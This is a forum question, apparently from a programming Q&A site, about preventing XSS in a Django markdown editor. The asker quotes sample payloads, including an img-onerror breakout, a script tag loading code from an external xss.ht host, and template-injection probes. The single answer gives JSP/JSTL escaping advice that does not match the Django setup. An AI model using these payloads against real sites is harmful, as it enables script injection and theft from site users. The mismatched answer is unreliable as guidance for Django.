# How to prevent XSS attacks with HTML/Javascript?

Tags: django, markdown, xss

I want to know that how can I prevent script code and HTML attributes to stop from execution in editor of my website?

If someone add script tags with external link of code or call a function of jQuery in some attribute of HTML tag.

I am using markdown editor and django framework.

For example:

```
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
    '>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
    {{7*7}}{7*7}
```

Comment: I would recommend reading [Markdown and XSS](https://michelf.ca/blog/2010/markdown-and-xss/). While the author is the developer of PHP Markdown, the principles apply to any implementation in any language. For a HTML sanitizer in Python (assumed from the [django] tag)  [bleach-whitelist](https://github.com/yourcelf/bleach-whitelist) is probably a good place to start.

Answer (score 0):

use htmlEscape="true" for all input fields.
If you are displaying a value, try fn:escapeXml(value). You need to import jstl functions taglib